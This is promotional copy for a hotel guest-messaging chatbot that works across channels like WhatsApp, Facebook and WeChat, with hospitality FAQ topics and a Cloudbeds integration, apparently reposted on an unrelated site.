Beyond the hotel website, an advanced chatbot integrates with various communication channels such as Facebook, WhatsApp, Instagram, Line, Telegram, WeChat, and Google My Business. Over 200 hospitality-specific FAQ topics available for hotels to train the hotel chatbot, and the possibility of adding custom FAQs according to your needs. Send canned responses directing users to the chatbot to resolve user queries instantly. We take care of your setup and deliver a ready-to-use solution from day one. Our user-friendly back office, the Console, is designed for you to navigate easily through your communication with your guest in your preferred language. Moreover, with Whistle for Cloudbeds, you can create authentic and meaningful connections with customers, resulting in more revenue for the business.

Comments are closed.

Copyright © 2017 Big Estruturas - Todos os direitos reservados